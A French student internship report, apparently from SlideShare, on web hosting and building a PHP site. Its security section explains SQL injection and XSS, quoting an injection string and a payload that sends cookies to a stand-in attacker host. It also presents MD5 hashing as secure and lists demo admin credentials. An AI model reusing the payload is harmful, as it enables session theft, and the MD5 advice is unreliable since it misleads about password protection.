SlideShare une entreprise Scribd logo
Institut Supérieur des Études Technologiques
De Mahdia
Département Technologies de l’Informatique
Rapport de
Stage de Perfectionnement
Elaboré par :
Mohamed Amine Mahmoudi
Période du stage : 11/01/2016 à 07/02/2016
Société d’accueil : EL BOOTIC
©Année Universitaire 2015-2016©
Remerciements
Au terme de ce stage je tien a exprimer mes respects mais
connaissances et mes sincère remerciement au personnels du
EL BOOTIC, le directeur de la société AYED HATEM, qui
ont contribués à l’élaboration de ce rapport modeste.
Ainsi ceux qui mon aidées durant cette période pour effectuer
mon stage dans les meilleurs conditions, et je tiens également
à remercier virement tous ceux qui m’ont fait preuve d’un
grand esprit de collaboration et d’initiative tous les personnels
de l’équipe technique et qui m’apportent une aide précieuse
par leurs suggestion et leurs conseils.
Que tous ceux qui ont contribué de près ou de loin à la
réalisation de ce travail trouvent ici l’expression de nos
sincères gratitudes.
Sommaire
Table des matières
Introduction générale ...........................................................................................................................1
Chapitre 1 : Présentation du cadre du stage........................................................................................2
I. Introduction ....................................................................................................................2
II. Présentation de la société................................................................................................2
III. Contexte du stage ...........................................................................................................2
IV. Conclusion......................................................................................................................3
Chapitre 2 : Notions théoriques ............................................................................................................4
I. Introduction ....................................................................................................................4
II. Hébergement...................................................................................................................4
1. Définition .................................................................................................................4
2. Types........................................................................................................................4
3. Exemples des hébergeurs .........................................................................................5
III. Références web ..............................................................................................................5
1. Définition .................................................................................................................5
2. Types........................................................................................................................5
IV. Les Failles web ..............................................................................................................6
3. Définition .................................................................................................................6
4. Types des failles.......................................................................................................6
V. Outils de développement ................................................................................................7
1. PHP ..........................................................................................................................7
2. SQL ..........................................................................................................................7
3. Javascript et Jquery ..................................................................................................7
4. Bootstrap ..................................................................................................................7
VI. Conclusion......................................................................................................................7
Chapitre 3 : Spécification des besoins ..................................................................................................8
I. Introduction ....................................................................................................................8
II. Besoins fonctionnels.......................................................................................................8
III. Besoins non fonctionnels ...............................................................................................8
IV. Diagramme de cas d’utilisation ......................................................................................8
V. Conclusion......................................................................................................................9
Chapitre 4 : Conception.......................................................................................................................10
I. Introduction ..................................................................................................................10
II. Diagramme de séquence ..............................................................................................10
III. Diagramme de classe....................................................................................................11
IV. Conclusion....................................................................................................................12
Chapitre 5 : Tâches Effectuées............................................................................................................13
I. Introduction ..................................................................................................................13
II. Configuration de l’hébergement web ..........................................................................13
1. Réserver le nom du domaine..................................................................................13
2. FTP.........................................................................................................................14
3. Mail ........................................................................................................................14
4. Base des données....................................................................................................14
5. Autres Tâches.........................................................................................................14
III. Réalisation....................................................................................................................15
1. Partie principale .....................................................................................................15
2. Partie Administrateur .............................................................................................16
3. Partie Client............................................................................................................17
IV. Sécurité du site .............................................................................................................15
1. Faille Injection SQL...............................................................................................18
2. Faille XSS ..............................................................................................................18
3. Cryptage des données.............................................................................................19
V. Conclusion....................................................................................................................19
Conclusion générale .............................................................................................................................20
Bibliographie et Nétographie .............................................................................................................21
Annexe...................................................................................................................................................22
Liste des figures
Table des Figures
Figures 1 : diagramme de cas d’utilisation ................................................................................ 9
Figures 2 : diagramme de séquence ........................................................................................ 10
Figures 3 : diagramme de classe ............................................................................................. 11
Figures 4 : réservation nom du domaine ................................................................................. 13
Figures 5 : Envoyé les fichiers avec Filezilla .......................................................................... 14
Figures 6 : Base des données PhpMyAdmin ........................................................................... 15
Figures 7 : site web en partie principale .................................................................................. 16
Figures 8 : authentification des administrateurs ...................................................................... 16
Figures 9 : tableau de bord pour les administrateurs .............................................................. 17
Figures 10 : Panneau de contrôle pour les clients......................................................................... 17
Introduction générale
Stage de Perfectionnement Page 1
Introduction générale
Dans l’occasion de la période de stage j’examine comment crée une application
mobile exactement une version Android, tous les universités et les instituts supérieurs l’étude
pratique dans l’étude théorique à partir de stages qui ont la durée des études.
Le stage est un moyen qui permet à l’étudiant de s’intégrer dans la vie professionnelle en vue
d’avoir une idée générale sur le fonctionnement de l’entreprise. A ce niveau, l’objectif des
instituts supérieurs des études technologies est de permet à l’étudiant d’enrichir ses
connaissances et de s’adapter à l’environnement de l’entreprise.
En effet, mon stage d’ouvrir m’a permis l’occasion de s’intégrer au sien de la vie
professionnelle et d’élargir mes connaissances.
Finalement, l’objectif de ce stage est de faire une intervention pratique qui me permet
d’appliquer mes connaissances scientifiques et techniques relatives au domaine de
l’informatique, et de tester mes facultés d’analyse et de synthèse.
Chapitre 1 : Présentation du cadre du stage
Stage de Perfectionnement Page 2
Chapitre 1 : Présentation du cadre du stage
I. Introduction
Dans ce chapitre, nous allons présenter en premier lieu la société dans laquelle nous
avons effectué notre sujet de travail proposé tout en expliquant ses objectifs ainsi les
fonctionnalités nécessaires pour le réaliser.
II. Présentation de la société
EL BOOTIC est une société spécialisée dans le commerce et la maintenance du
matériel informatique, ainsi que dans le développement des logiciels et applications
informatiques. EL BOOTIC a été créée le 20 mai 2000 par hatem ayed sous forme de
société à responsabilité limitée (SARL). Grâce à la volonté qui anime l’équipe pour
fournir les meilleurs services aux clients et la qualité du matériel informatique, EL
BOOTIC a rapidement pris sa place sur le marché. Leurs activités sont diverses : vente
matériels et accessoires informatiques, maintenance et réparation matériels
informatiques et pièces électroniques, développement de logiciels, création des sites
WEB, assistance des entreprises.
Le stage s’est effectué en précisant sa vocation du développement un site web
moderne, efficace, et dans période exacte
Son adresse est Av hbib bourguiba Ksibet El Medyouni 5031
III. Contexte du stage
Dans l’objectif de maitriser et approfondir nos connaissances déjà acquises, la société
el bootic nous a accueillis dans ces locaux.
Elle nous a proposé comme sujet de suivre des formations sur les outils bureautiques
et approfondir les connaissances dans le développement mobile.
Les formations proposées par la société :
 Création un site web dynamique & hébergée
Chapitre 1 : Présentation du cadre du stage
Stage de Perfectionnement Page 3
Les formations consistent à connaitre les différentes fonctionnalités de ces outils, bien
maitrisés ces connaissances à l’aide des exemples et des travaux pratiques.
IV. Conclusion
A travers ce chapitre, nous avons présenté le cadre du projet, identifié à atteindre et le
travail à faire. Compte tenu de cela, nous proposant les détails du travail dans le
chapitre suivant.
Chapitre 2 : Notations théoriques
Stage de Perfectionnement Page 4
Chapitre 2 : Notions théoriques
I. Introduction
Avant de commencer le travail, nous présentons quelques notions théoriques
utilise dans mon stage.
Tout d'abord, nous identifions les mots importants, Cela m'a aidé à compléter le
travail requis et les mots techniques au cadre de stage.
II. Hébergement
1. Définition
Est une entité ayant pour vocation de mettre à disposition
des internautes des sites web conçus et gérés par des tiers.
Il donne ainsi accès à tous les internautes au contenu déposé dans leurs
comptes par les webmestres souvent via un logiciel FTP ou un gestionnaire de
fichiers. Pour cela, il maintient des ordinateurs allumés et connectés 24 heures
sur 24 à Internet (des serveurs web par exemple) par une connexion à très haut
débit (plusieurs centaines de Mb/s), sur lesquels sont installés des
logiciels : serveur HTTP (souvent Apache), serveur de messagerie, de base de
données...
2. Types
 Les hébergements partagés ou mutualisés : Chaque serveur héberge
plusieurs sites, jusqu'à plusieurs milliers, et ce dans le but de mutualiser
les coûts. Le principal avantage est le prix, le principal inconvénient est
que le client mutualisé n'est pas l'administrateur du serveur, il est donc
souvent tributaire du bon vouloir de l'hébergeur s'il souhaite une
technologie particulière.
 Les hébergements dédiés : Le client dispose alors de son propre
serveur, et peut en général l'administrer comme il le souhaite, ce qui est
le principal avantage de ce type d'offre. Le fournisseur du serveur reste
cependant propriétaire du serveur. Les inconvénients sont : le prix
Chapitre 2 : Notations théoriques
Stage de Perfectionnement Page 5
beaucoup plus élevé que les hébergements mutualisés, et le besoin de
compétences pour administrer la machine correctement.
 L'hébergement virtuel dédié via un hyperviseur qui offre au client la
souplesse d'un dédié (le client administre sa machine à sa convenance)
en lui fournissant une machine virtuelle qui utilise une partie des
ressources d'un serveur (physique) par des techniques de virtualisation
(informatique).
 Les hébergements dédiés dits « managés », avec « serveur dédié info
géré » ou « clés en main » : Le client dispose de son propre serveur
mais les techniciens de l'hébergeur s'occupent de sa gestion système.
Cette solution est parfaite si vous n'avez aucune connaissance
technique sur son administration. Il suffit simplement de déposer son
site. Ce type d'hébergement cherche à s'adapter aux besoins.
3. Exemples des hébergeurs
 OVH
 1and1
 Gandi
 One
 Ikola
 Lws
 Hostgator
 Etc…
III. Référencement web
1. Définition
C’est l’identifier le site dans les moteurs des recherches, c’est-à-dire
l’indexation les pages.
2. Types
 Le référencement naturel, il est directement en lien avec les contenus de
votre site. Votre positionnement est le révélateur de la bonne
compréhension de vos contenus par les moteurs de recherche.
 Le référencement manuel est la deuxième clef de votre succès sur
internet. Votre position sur Google dépend de votre popularité
Chapitre 2 : Notations théoriques
Stage de Perfectionnement Page 6
mesurée notamment par le nombre de liens de qualité qui pointent vers
votre site. D'où la nécessité du référencement manuel.
 Le référencement publicitaire, ce sont des liens mis en place depuis des
bannières publicitaires, les adwords, les animations, les jeux, les buzz.
 Le référencement de localisation (Google maps), il favorisera toutes les
requêtes effectuées sur des critères géographiques.
IV. Les failles web
1. Définition
Une faille c'est en fait une faiblesse dans un code qui peut être exploitée
pour détourner un site de sa fonction première. Le pirate va pouvoir
récupérer des données confidentielles (comme les infos personnelles des
inscrits) ou modifier le comportement du site. Mais heureusement pour
nous, il est possible de se protéger de ces fameuses failles.
2. Type des failles
 L’injection SQL : L'injection SQL est une méthode d'attaque très
fréquemment utilisée dans le monde du hack. Elle consiste à modifier
une requête SQL en injectant des morceaux de code non-filtrés,
généralement par le biais d'un formulaire.
 La faille include : à faille include est également très dangereuse.
Comme son nom l'indique, elle exploite une mauvaise utilisation de la
fonction include(). Cette fonction est très souvent utilisée pour
exécuter du code PHP se situant dans une autre page, et
particulièrement pour la connexion à une base de données.
 La faille upload : La faille upload est une des failles les plus
dangereuses. Vous connaissez sûrement la balise HTML qui permet
l'upload de fichier
 La faille XSS : (plus officiellement appelée Cross-Site Scripting) est
une faille permettant l'injection de code HTML ou JavaScript dans des
variables mal protégées.
 CSRF : Cross site request forgery
 CRLF : Carriage Return Line Feed
 Etc.
Chapitre 2 : Notations théoriques
Stage de Perfectionnement Page 7
V. Outils du développement
1. PHP
HyperText Preprocessor, plus connu sous son sigle PHP (acronyme récursif),
est un langage de programmation libre principalement utilisé pour produire
des pages Web dynamiques via un serveur HTTP, mais pouvant également
fonctionner comme n'importe quel langage interprété de façon locale. PHP est
un langage impératif orienté objet comme C++. PHP a permis de créer un
grand nombre de sites web célèbres, comme Facebook, YouTube,
Wikipedia, etc. Il est aujourd'hui considéré comme la base de la création des
sites Internet dits dynamiques.
2. SQL
Sigle de « Structured Query Language », en français langage de requête
structurée est un langage informatique normalisé servant à exploiter des bases
de données relationnelles. La partie langage de manipulation des données de
SQL permet de rechercher, d'ajouter, de modifier ou de supprimer des données
dans les bases de données relationnelles.
3. JavaScript et Jquery
JavaScript est un langage de programmation de scripts principalement employé
dans les pages web interactives mais aussi pour les serveurs.
4. Bootstrap
Bootstrap est un framework front-end (HTML5, CSS et JavaScript)
spécialement conçu pour le développement d'application web "responsive",
c'est-à-dire qui s’adapte automatiquement à différents dispositifs et tailles
d'écran (desktop, tablettes, smartphones, ...).
VI. Conclusion
Dans ce chapitre nous avons eu sur certains mots clés que j’ai utilisés dans le
stage et en cours de la création d’application. Quelle sont c'est tâches ?
Chapitre 3 : Spécification des besoins
Stage de Perfectionnement Page 8
Chapitre 3 : Spécification des besoins
I. Introduction
Pendant la période de mon stage j'ai fait des tâches, qui sont généralement de
création une application mobile de la société.
Pour cela je définirai les tâches, qu'on j'ai fait durant la période de stage.
II. Besoins fonctionnels
Avant la création de l’application il faut définir quelques besoins fonctionnels sont
généralement
 Partie pour les administrateurs
 Partie pour les clients
 Sécurité
 Vend en ligne
 Synthèse statistique
III. Besoins non fonctionnels
Les besoins non fonctionnels décrivent toutes les contraintes auxquelles est soumis
le système pour sa réalisation et son bon fonctionnement.
 Ergonomie et souplesse
 Rapidité
 Efficacité
IV. Diagramme de cas d’utilisation
Chapitre 3 : Spécification des besoins
Stage de Perfectionnement Page 9
Figure 1 : diagramme de cas d’utilisation
V. Conclusion
Dans ce chapitre on a présenté une étude du système existant, les lacunes qu’il
comprend ainsi que les solutions que nous proposons pour pallier ces problèmes,
nous avons aussi cité les besoins fonctionnels et non fonctionnels qui sont
indispensables pour mieux faciliter le travail à réaliser.
Dans le chapitre suivant nous allons aborder l’étude conceptuelle de notre site, tout
en mentionnant tous les scénarios possibles, les acteurs, les diagrammes.
Chapitre 4 : Conception
Stage de Perfectionnement Page 10
Chapitre 4 : Conception
I. Introduction
Ce chapitre a pour objectif de présenter la solution conceptuelle proposée. En
d’autres termes, ce chapitre devrait répondre à la question comment faire.
La conception est décrite par un ensemble de diagrammes relevant soit du langage
de modélisation UML.
II. Diagramme de séquence
Figure 2 : Diagramme de séquence
Chapitre 4 : Conception
Stage de Perfectionnement Page 11
III. Diagramme de classe
Figure 3 : Diagramme de classe
Chapitre 4 : Conception
Stage de Perfectionnement Page 12
IV. Conclusion
En clair, comme nous venons de le voir, ce chapitre était consacré, à la conception
des diagrammes, de séquence qui nous ont permis de dégager l'architecture
générale de notre application représentée ici par ce diagramme de classe qui nous
renseigne sur la relation homme Machine de notre application qui sera détaillée
dans le prochain chapitre.
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 13
Chapitre 5 : Tâches Effectuées
I. Introduction
Après avoir placé notre projet dans son cadre général, une étape indispensable
serait de présenter l’environnement sur lequel se base l’application. Dans ce
chapitre, nous allons présenter les outils bureautiques tels que les notions des
hébergements web étudié pour améliorer, élargir et bien maitriser nos
connaissances.
II. Configures de l’Hébergement Web
1. Réserver nom du domaine
Dans cadre de stage en va réserver un nom du domaine, tout d’abord je
recherche un nom existe, c’est-à-dire le nom n’est pas réserver
Exemple.com … Réserver
Devarabe.com …n’est pas réservé donc j’acheté.
Je utilisé www.whois.com
Figure 4 : réservation nom du domaine
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 14
2. FTP
Après le commander l’hébergement, je crée des comptes FTP (File
Transfer Protocol). Ce service permet d’envoi les grands fichiers au serveur
du site facilement, par suite je envoyé les fichiers en utilise logiciel
Filezilla
Figure 5 : Envoyé les fichiers avec Filezilla
3. Mail
L’hébergeur offre des nombres des comptés mail et une interface pour
contrôle les emails. Il existe plusieurs applications web pour les emails,
mais généralement en utilisent
 Roundcube
 Horde
 SquirrelMail
4. Base des données
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 15
Pour chaque hébergeur ou par un offre d’hébergement, l’hébergeur
donnée un nombre des basées des données (1, 2, 3 ou illimité).
J’obtenue 5 basés qui travaille avec phpmyadmin en utilise langage
SQL, tout d’abord création du tables et liée entre eux.
Lorsque j’installe WordPress les tables créent automatiquement au sien
de l’interruption du script d’installation WordPress.
Figure 6 : base des données PhpMyAdmin
5. Autre Tâches
Au cours de configurations de l’hébergement, je modifie le mot de
passe de contrôle panel qui je réservoir à partir de l’hébergement, je
respect des normes lorsque en crée le mot de passe comme l’utilisation
des caractères minuscule & majuscule, des chiffres et des symboles.
Ainsi que je crée les sous domaine c’est-à-dire une racine de site
comme suit SOUS_DOMAINE.NOM_SITE.COM.
Puis je modifier les paramètres du DNS pour le pointage sur domaine,
autrement l’hébergeur fait lé automatiquement.
III. Réalisation
1. Partie Principale
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 16
C’est la partie accessible par tous les visiteurs du site web, qui en trouvent
les informations de la société.
Figure 7 : site web en partie principale
2. Partie Administrateur
Figure 8 : authentification des administrateurs
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 17
Figure 9 : tableau de bord pour les administrateurs
3. Partie Client
Figure 10 : Panneau de contrôle pour les clients
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 18
IV. Sécuriste du site
1. Faille Injection SQL
Cette faille apparaît quand il est possible d'injecter du code SQL dans les
requêtes SQL qui sont faites dans une page web. C'est actuellement la
"meilleure" vulnérabilité Web en rapport fréquence/surface d'exploitation.
Les conséquences d'une faille SQL peuvent être multiples, du
contournement de formulaires d'authentification au dump complet de la base
de données en passant par l'exécution arbitraire de code. Dans ce premier
article, nous allons essayer de nous familiariser avec des injections simples
(appelées aussi injections du premier ordre).
Exemple : ‘ OR 1=1 OR ‘’=’
Premièrement, le plus important, filtrer les variables dans les formulaires.
Moi personnellement j'utilise une fonction PHP qui me permet de savoir s'il
y a un espace ou tous autres caractères spéciaux non désirés. Il est aussi
important de préciser que si vous protéger votre formulaire par une fonction
JavaScript un pirate va recopier votre formulaire et exploiter en local rien de
plus facile, alors à ne pas faire.
2. Faille XSS
Il existe en fait deux type de XSS :
 Le XSS réfléchi (non permanent)
 Le XSS stocké (permanent)
Exemple : <SCRIPT>ALERT('IL Y A UNE FAILLE XSS')</SCRIPT>
Exemple : <IMG SRC="AZERTY.JPG"
ONERROR="WINDOW.LOCATION='HTTP://WWW.SITE_DU_HACKER.COM/RECUPERATION_COOKI
E.PHP?COOKIE='+DOCUMENT.COOKIE;">
La solution la plus adaptée contre cette faille est d'utiliser la fonction
HTMLSPECIALCHARS(). Cette fonction permet de filtrer les symboles du type <, &
ou encore ", en les remplaçant par leur équivalent en HTML. Par exemple :
 Le symbole & devient &amp;
 Le symbole " devient &quot;
 Le symbole ' devient &#39;
Chapitre 5 : Tâches Effectuées
Stage de Perfectionnement Page 19
$PSEUDO = HTMLSPECIALCHARS ($_POST ['PSEUDO']);
3. Cryptage des données
Dans la base des données l’insertion des données et sur tout la colonne de
mot de passe sera crypte avec la fonction MD5() pour assurer bien la
sécurité des comptes des administrateurs et leurs clients
V. Conclusion
Dans le chapitre réalisation nous avons appelé à présenter les interfaces réalisé
dans notre site web pour clarifier les étapes d’utilisation de notre site avec ses
deux parties statique et dynamique.
Conclusion générale
Page 20
Conclusion générale
Ce travail a été réalisé dans le cadre de notre stage de perfectionnement de un mois au sein de
Institué Supérieur des Etudes Technologique de Mahdia Durant notre stage nous a été
bénéfique bien sur le plan théorique que pratique.
Ce stage été une bonne occasion pour élargir mes connaissances pratiques pour s’adapter aux
nouvelles technologies qui s’améliorent jour pour persister dans un secteur qui s’éveille chaque jour
sur des nouvelles innovations.
Le projet m’a également donnée l’occasion de mieux de la société de service informatique, leur
fonctionnement en interne et vis-à-vis des clients, c’est un milieu qu’il est utile d’appréhender pour
débuter sa carrière en tant que développeur.
En guise de perspective, une formation techniques d’hébergement sera très intéressent pour suivre les
améliorations technologiques, des connaissances en accès seront bien complémentaire à mes
connaissances.
Pour voir le site : www.lelkol.net/StageDePerfectionnement/
Administrateur : www.lelkol.net/StageDePerfectionnement/admin/ Login : med pass : 123456
Client: www.lelkol.net/StageDePerfectionnement/client/ Login : med pass : azerty
Bibliographie et Nétographie
Stage de Perfectionnement Page 21
Bibliographie et Nétographie
[1] Sylvain Baudoin. « Télécharger Comment Héberger Son Site Web Chez Soi », Paris, 2008, 200p
[2] Damien Nouvel. « Création de site web Hébergement de site web », Paris, 2005, 53p
[3] Christophe AUBRY. « WordPress 4Un CMS pour créer et gérer blogs et sites Web »,473p
[4] Patrick Zemour. « Le guide pratique WordPress Créez et animez vos blogs et sites web »,
2012,154p
[5] http://guides.ovh.com/ : guide d’utilisation l’hébergeur OVH
[6] http://getbootstrap.com/: base des connaissances sur Bootstrap
[7] http://www.w3schools.com/bootstrap/: Exemple en ligne en utilisent Bootstrap
[8] https://openclassrooms.com/courses/protegez-vous-efficacement-contre-les-failles-web: Tutorial
sur les failles web.
[9] http://fr.wikipedia.org/wiki/Hébergeur_web : Hébergeur web
[10] http://fr.wikipedia.org/wiki/CPanel : Cpanel
[11] http://www.networking4all.com/fr/support/certificats+ssl/manuels/cpanel/ : Cpanel
[12] http://fr.wikipedia.org/wiki/Hébergement_mutualisé : hébergement mutualisé
[13] http://openclassrooms.com/courses/ameliorez-la-visibilite-de-votre-site-grace-au-
referencement : Améliorez la visibilité de votre site grâce au référencement
[14] http://www.w3c2i.com/faqs/differents-types-de-referencement.html : DIFFÉRENTS TYPES DE
RÉFÉRENCEMENT
[15] http://www.bases-hacking.org/failles-web.html : Les failles web
ANNEXE
Stage de Perfectionnement Page 22
Liste des annexes :
Annexe 1 : Facture d’hébergement
Annexe 2 : Création Base des données sur serveur
Annexe 3 : Structure de base des données
Annexe 1 : Facture d’hébergement
Annexe 2 : Création Base des données sur Serveur
Annexe 3 : Structure de la Base des données

Contenu connexe

PDF
Rapport de stage d'initiation 2015 Mahmoudi Mohamed Amine
DOC
Rapport de stage de perfectionnement
PDF
Rapport Projet Fin d'Études PFE
DOCX
Rapport stage-perfectionnement-oussema-hamdi (1) (3)
PDF
Rapport pfe Conceptionet Developpement d'une Application web et Mobile
PDF
Rapport pfe
PDF
Rapport PFE : Développement D'une application de gestion des cartes de fidéli...
PPTX
Présentation PFE
Rapport de stage d'initiation 2015 Mahmoudi Mohamed Amine
Rapport de stage de perfectionnement
Rapport Projet Fin d'Études PFE
Rapport stage-perfectionnement-oussema-hamdi (1) (3)
Rapport pfe Conceptionet Developpement d'une Application web et Mobile
Rapport pfe
Rapport PFE : Développement D'une application de gestion des cartes de fidéli...
Présentation PFE

Tendances (20)

PDF
Rapport Projet De Fin D'étude Développent d'une application web avec Symfony2
PDF
Rapport Projet de Fin d'Etudes
PPT
présentation soutenance PFE.ppt
PPTX
Ma présentation PFE : Application Android & Site Web
PPTX
Présentation de mon PFE
PPTX
Soutenance mémoire de fin d'études
PDF
Rapport Mini Projet : élaborer un moteur de Recherche spécialisé en Education
PDF
Rapport de stage du fin d'étude
DOCX
Projet de fin d'etude gestion informatique
PDF
rapport de stage
PDF
Conception et Réalisation Application Web Laravel PFE BTS
PDF
Pfe conception et développement d'une application web GMAO JEE
PPTX
GUIDE DE PRÉSENTATION DU STAGE D’INITIATION
PDF
Rapport pfe 2017 Système de gestion des rendez-vous médicaux
PDF
Rapport du projet fin d'etudes
PPTX
Conception et Réalisation d’une Plateforme Web de Gestion des achats
PDF
Rapport de stage développement informatique
PDF
Rapport PFE - Mise en place d'OpenERP pour IT-Consulting
PDF
Rapport pfe licence
PDF
Conception et réalisation d'une application de gestion intégrée au sein de la...
Rapport Projet De Fin D'étude Développent d'une application web avec Symfony2
Rapport Projet de Fin d'Etudes
présentation soutenance PFE.ppt
Ma présentation PFE : Application Android & Site Web
Présentation de mon PFE
Soutenance mémoire de fin d'études
Rapport Mini Projet : élaborer un moteur de Recherche spécialisé en Education
Rapport de stage du fin d'étude
Projet de fin d'etude gestion informatique
rapport de stage
Conception et Réalisation Application Web Laravel PFE BTS
Pfe conception et développement d'une application web GMAO JEE
GUIDE DE PRÉSENTATION DU STAGE D’INITIATION
Rapport pfe 2017 Système de gestion des rendez-vous médicaux
Rapport du projet fin d'etudes
Conception et Réalisation d’une Plateforme Web de Gestion des achats
Rapport de stage développement informatique
Rapport PFE - Mise en place d'OpenERP pour IT-Consulting
Rapport pfe licence
Conception et réalisation d'une application de gestion intégrée au sein de la...
Publicité

Similaire à Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine (20)

PDF
Rapport Stage Ouvrier - Application J2EE - Haroun SMIDA
PDF
Rapport de Stage Fin D’étude - Développement Web et Multimédia
PDF
Republique_Tunisienne_Ministere_de_lEnse.pdf
PDF
Rapport-de-perfectionnement-Jasser-Degani.pdf
PDF
Conception et développement d’un système d’alerte et notification d’une tou...
PDF
Rapport de stage PFE ( DUT) chez Synthèse Conseil - Jaiti Mohammed
PDF
GEmploi : Smart school timetable management software using RFID technology
PDF
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
PDF
Rapport de Projet de Fin d'étude .
PDF
Rapport finiale
PDF
Rapport de stage d'été
PDF
La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !
PDF
La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !
DOCX
application mobile de gestion de panne de BTS
PDF
ECH__1605.0018v1_rapport de stage de fin d'etude pour master spécialisé
PDF
Mémoire : Cloud iaas Slim Hannachi
PDF
Briqueterie saoui
DOCX
Rapport de projet de fin d’étude
PDF
Gestion des Chercheurs d’Emploi
PDF
Étude et mise en place d'un serveur messengerie
Rapport Stage Ouvrier - Application J2EE - Haroun SMIDA
Rapport de Stage Fin D’étude - Développement Web et Multimédia
Republique_Tunisienne_Ministere_de_lEnse.pdf
Rapport-de-perfectionnement-Jasser-Degani.pdf
Conception et développement d’un système d’alerte et notification d’une tou...
Rapport de stage PFE ( DUT) chez Synthèse Conseil - Jaiti Mohammed
GEmploi : Smart school timetable management software using RFID technology
Rapport PFE ingénieur réseaux marwen SAADAOUI ( Juin 2018 )
Rapport de Projet de Fin d'étude .
Rapport finiale
Rapport de stage d'été
La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !
La VoIP, une solution d'avenir pour les entreprises... mais pas seulement !
application mobile de gestion de panne de BTS
ECH__1605.0018v1_rapport de stage de fin d'etude pour master spécialisé
Mémoire : Cloud iaas Slim Hannachi
Briqueterie saoui
Rapport de projet de fin d’étude
Gestion des Chercheurs d’Emploi
Étude et mise en place d'un serveur messengerie
Publicité

Dernier (20)

PPTX
Formation Equipement de protection .pptx
PPTX
LACTION-DIDACTIQUE-Les-theories-dapprentissage.pptx
PDF
🎓 Le Secret des Profs Captivants - 💡 Enseigner, c’est parler - Introduction_v2
PPTX
Séminaire protection des personnes vulnérables.pptx
PPTX
Le tableau volé.pptx Film françaisde pascal Bonitzer
PDF
_LEAN_MANAGEMENT_Am_lioration_continue_�_1724845102.pdf
PPTX
le-present-de-lindicatif-ou-le-subjonctif-present-exercice-grammatical-feuill...
PPTX
Hopital bonne sante.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
PPTX
Introduction à la gestion des projets et au suivi
PPTX
4.1 EXEMPLES DE NICHES sur les réseaux.pptx.pptx
PPTX
Florence Delay.pptx Écrivaine française née à bayonne
PPTX
L'évaluation-Pédagogique pour enseignants.pptx
PPTX
Marketing de l'Artisanat et la technique
PDF
Créer sa vidéo pédagogique: interface nomade et principes pédas appliqués aux...
PPTX
domaine 1.pptxhorgnv,,odl,vjfnghburjf,c,el
PPT
CARIOLOGIE - Copie.ppt pour les étudiants
PDF
🎓 Le Secret des Profs Captivants - 💡 Pourquoi l’oral est stratégique en class...
PPTX
Conception de documents et d'interfaces numériques.pptx
PDF
Cours: Introduction à la Sécurité des Données
PPTX
3.1 COMPRENDRE LES NICHES sur les réseaux.pptx.pptx
Formation Equipement de protection .pptx
LACTION-DIDACTIQUE-Les-theories-dapprentissage.pptx
🎓 Le Secret des Profs Captivants - 💡 Enseigner, c’est parler - Introduction_v2
Séminaire protection des personnes vulnérables.pptx
Le tableau volé.pptx Film françaisde pascal Bonitzer
_LEAN_MANAGEMENT_Am_lioration_continue_�_1724845102.pdf
le-present-de-lindicatif-ou-le-subjonctif-present-exercice-grammatical-feuill...
Hopital bonne sante.pptxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Introduction à la gestion des projets et au suivi
4.1 EXEMPLES DE NICHES sur les réseaux.pptx.pptx
Florence Delay.pptx Écrivaine française née à bayonne
L'évaluation-Pédagogique pour enseignants.pptx
Marketing de l'Artisanat et la technique
Créer sa vidéo pédagogique: interface nomade et principes pédas appliqués aux...
domaine 1.pptxhorgnv,,odl,vjfnghburjf,c,el
CARIOLOGIE - Copie.ppt pour les étudiants
🎓 Le Secret des Profs Captivants - 💡 Pourquoi l’oral est stratégique en class...
Conception de documents et d'interfaces numériques.pptx
Cours: Introduction à la Sécurité des Données
3.1 COMPRENDRE LES NICHES sur les réseaux.pptx.pptx

Rapport de stage de perfectionnement - Mahmoudi Mohamed Amine

  • 1. Institut Supérieur des Études Technologiques De Mahdia Département Technologies de l’Informatique Rapport de Stage de Perfectionnement Elaboré par : Mohamed Amine Mahmoudi Période du stage : 11/01/2016 à 07/02/2016 Société d’accueil : EL BOOTIC ©Année Universitaire 2015-2016©
  • 2. Remerciements Au terme de ce stage je tien a exprimer mes respects mais connaissances et mes sincère remerciement au personnels du EL BOOTIC, le directeur de la société AYED HATEM, qui ont contribués à l’élaboration de ce rapport modeste. Ainsi ceux qui mon aidées durant cette période pour effectuer mon stage dans les meilleurs conditions, et je tiens également à remercier virement tous ceux qui m’ont fait preuve d’un grand esprit de collaboration et d’initiative tous les personnels de l’équipe technique et qui m’apportent une aide précieuse par leurs suggestion et leurs conseils. Que tous ceux qui ont contribué de près ou de loin à la réalisation de ce travail trouvent ici l’expression de nos sincères gratitudes.
  • 3. Sommaire Table des matières Introduction générale ...........................................................................................................................1 Chapitre 1 : Présentation du cadre du stage........................................................................................2 I. Introduction ....................................................................................................................2 II. Présentation de la société................................................................................................2 III. Contexte du stage ...........................................................................................................2 IV. Conclusion......................................................................................................................3 Chapitre 2 : Notions théoriques ............................................................................................................4 I. Introduction ....................................................................................................................4 II. Hébergement...................................................................................................................4 1. Définition .................................................................................................................4 2. Types........................................................................................................................4 3. Exemples des hébergeurs .........................................................................................5 III. Références web ..............................................................................................................5 1. Définition .................................................................................................................5 2. Types........................................................................................................................5 IV. Les Failles web ..............................................................................................................6 3. Définition .................................................................................................................6 4. Types des failles.......................................................................................................6 V. Outils de développement ................................................................................................7 1. PHP ..........................................................................................................................7 2. SQL ..........................................................................................................................7 3. Javascript et Jquery ..................................................................................................7 4. Bootstrap ..................................................................................................................7 VI. Conclusion......................................................................................................................7 Chapitre 3 : Spécification des besoins ..................................................................................................8 I. Introduction ....................................................................................................................8 II. Besoins fonctionnels.......................................................................................................8 